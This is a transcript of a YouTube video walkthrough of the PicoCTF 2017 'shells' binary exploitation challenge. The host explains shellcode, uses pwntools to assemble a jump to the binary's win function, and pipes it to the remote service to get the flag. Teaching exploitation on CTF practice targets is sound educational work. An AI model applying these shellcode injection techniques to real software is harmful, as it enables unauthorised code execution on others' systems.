 Hello, YouTube. My name is John Hammond. This is more Pico CTF 2017 level 2. Normally, I would be moving on to the next challenge in the web category with the toaster wars challenges. However, they are currently down at the moment, and I've asked them a lot to fix it. I don't really want to ask again. So we'll stand by on that. So let's move into the Biner Exploitation category. Shells is the first one with the Z at the end. However, actually exploring this challenge in the next, I have this significant hunch that shells with an S and 70 points is actually the first challenge that's supposed to come before this one. So I'm going to do that to showcase it to you. Challenge is how much can a couple bytes do use shells given a binary and a source and there's the remote access Netcat connection. Hence here are read about basic shell code. You don't need a full shell yet. Just enough to get the flag. Okay, so let's go ahead and download these files. I will W get them in a folder that I have already created for it. Get the binary and get the source code, etc. So we can see what we're working with. Let's check out the source code. It is written in C. We have some headers that we're including defining an amount of stuff to I guess do something with we'll see. And there's a function called a win that we'll just call the system command cat out flag dot text. Okay, so that must be what we really want to execute. Let's check out this function vol. It does something with memory mapping that is allowed to execute protections to execute. Blah, blah, blah. Admittedly, I shouldn't learn more about memory mapping and stuff like that. I am again, I'm not that good at this kind of stuff, but It will eventually ask for, okay, give me 10 bytes, the amount of stuff to find up top. It will read in that amount. It'll determine if we're actually anything was returned and it looks like it will go ahead and try and execute the stuff that it is returned. So, or read in. So it looks like it is able to just execute code and again with that memory map that is executable. So this is a peculiar thing that we sometimes see in CTF challenges and we'll see in binary exploitation, vulnerability, challenges, stuff like that. Where the stack or the amount of memory that these things are stored is executable. You'll see techniques called depth or data execution prevention and NX that will try and mitigate that. However, in this binary NX is off, we can assume, obviously, because this memory map is allocated with executable permissions on it. So it says, okay, my mother told me to never accept things from strangers. How bad could be running a couple bytes? Then it will run that vuln function. So we want to figure out how do we can run this win system and the challenge is hinting at shell code. So if you haven't seen a shell code before, it's amazing and bewildering. It says in hacking, shell code is a piece of code uses the payload and the exploitation of software vulnerability. It's called shell code because it typically starts a command line shell, which the attacker can control a compromised machine, but it can do just about anything, whatever machine code that you write, et cetera, because shell code is written in machine code. So that is assembly and instructions and op codes and everything that we saw in the previous reverse engineering challenges. Now we'll put to use in actually exploiting a binary or like hacking a program. So we can go ahead and like find shell code on the internet. Really good location that I found is shell storm, and I'll reference that in the next video where we can just get a ton of cool shell code. But PwnTools will actually let us try and develop our own shell code. I want to showcase the documentation on that because it will give us an assembly platform where we can go ahead and craft our own shell code, ideally called shellcraft. So that's pretty neat. Will it give me documentation? Yes, great. If you don't have PwnTools, sudo app or sudo pip install, it's fantastic. Shellcraft is down here at the bottom. I hope to do a series on shellcraft sometime soon. But it essentially breaks down submodules based off architecture. In this case, if you want to check the binary, we can see what we're working with. It is just an Intel 386 and running on Linux. So we can reach that if we want to, and we can have it do specific things like cat ifile or try those other connections, etc, etc, etc. And we can do that all just fine. And we can all build it with an assembly function that will just as a nice utility in PwnTools, go ahead and give us the assembly for that thing. It will assemble whatever code we write in assembly into real opcodes. So if we wanted to do something simple, like call a function and that case win that we saw in the source code, that's really what we want right now before we jump into trying to cat stuff and open up pop new shells. We can just piece together some assembly code and run it. So let's try that. Let's I'm going to go ahead and create a new shell up here. I'll use Python. And on the other side, I want to check out the symbols in this binary. So I'm going to use redelf tack s to just able to showcase the symbols and we can see we have some information where when the function that we want here is stored local to the binary at this hexadecimal address 08048540. So I could copy that if I wanted to. And then in Python, let's import the PwnModule and then let's write what we will essentially have our own assembly that we're trying to do. Let's push that memory address onto the stack and then let's return so that we will just go to that location or call that function. Essentially, we'll just pop over there and move to this location, essentially calling the win function. Let's go ahead and compile that, not compile it, but put it in assembly op codes. And you can see that PwnTools will give it to us just like that. So if we wanted to, we could go ahead and print this out in Python, print that string. And I use Python to print it out so we can properly handle those raw bytes. You can see them on the terminal that I wouldn't be able to print those characters otherwise. So once we have that on centered output, we can go ahead and pass that to our shells binary. We'll just pipe in that input because if you remember reading the source code, that shells program will just want to run bytes. But it can't actually run those things. If you didn't give it anything, it's just waiting for input. So let's go ahead and get that stuff, that assembly that we just compiled, those op codes, that machine code, that shell code, put it on centered output, pipe it in. And once we pass the program, you can see it's trying to run that system command. Just as the win function explained, bincat flag dot text, no such file or directory. OK, looks like we've got it doing what we want it to do on our local thing. We just don't have a file flag dot text that we could actually have it display. If we fake something, it totally could do that for us, whatever. But let's go ahead and pass it to the real thing. Let's go ahead and take it with that remote netcat command. Running the program just remotely. Let's go ahead and pump that to our input and we get the flag just like that. So that is what we're working with here. We can, if we wanted to tail that, get just the flag, write a simple get flag script for that, just throw it in a little binary or bash script. That doesn't explain the whole process. We went through a read-off and generating that shell code with PwnTools. So we could write a PwnTools script to connect to it and generate that shell code on the fly if we particularly wanted to. But I don't want to get that far into it right now. However, I hope that was a good overview of our potential for shell code and just showing how we can do what we want in assembly and bring that to opcodes by using the PwnTools library. So that is an awesome tool kit and we'll get into doing other cool things in that next challenge that do I have the flag actually in my front? No, let's go ahead and submit it in that other challenge that I think really does come after this one for some reason, though the point value is different, where we aren't able to use that wind function. We just got to do something else like cat the flag, etc, etc. Quick shout out to the people that support me on Patreon. Thank you guys so much. One dollar or more on Patreon will give you a special shout out just like this at the end of our video. Five dollars or more on Patreon will give you early access to everything released on YouTube. If you did like this video, please do like comment and subscribe. Join our Discord server link in the description. It's a cool community of CTF players, programmers and hackers. If you hang out with me and other cool people and I would love to see you guys on Patreon and the next video. See ya.